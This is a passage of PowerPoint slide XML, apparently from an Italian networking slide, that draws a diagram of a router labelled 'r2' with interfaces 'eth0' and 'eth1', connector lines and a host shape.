                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C258BF-8F96-8E01-38A0-4699F8A441AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F46F21-7203-7619-8916-69B00E355343}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9259" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC06793-D4E5-9152-F512-BAEDADD8A065}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6D90F5-A246-3176-238C-D5F2BC867212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7420A59-29A6-CCD7-1F92-338DBB419B3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4DBDF6C-CC33-8E07-1312-E6882593F2C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70EE485-BB58-F6C0-94EA-166F7193715F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B89DB35-7D3B-8ED2-B083-C5C0E6252C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907C7144-F0BB-BEBB-6ADB-B10BC16A33A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382392FE-2640-EAC0-BDD1-5D3EF9A7F431}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{071D4ED0-88CD-344B-58FE-F7445B83CA18}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9269" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1001A607-F1A1-F352-353E-107821984569}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9270" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148D3B77-BBAD-5484-DDC6-EBFB933710A6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9271" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26F29ED-CA01-B276-8C5B-8E2643B48E9E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2755FEC4-57F5-BE5E-997E-BB5F17D2227D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF2E11D-952C-4DAA-A0C2-D3C62C1776B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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74" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B09911-DE28-BE89-41D9-800C83983424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="15436"/>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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7767D69B-DAEF-2A08-DC85-A43B70F9FC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B3D883-A75B-80AB-524C-310012B9822C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{905A3A30-D697-1155-692C-FD59D9DB2FCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
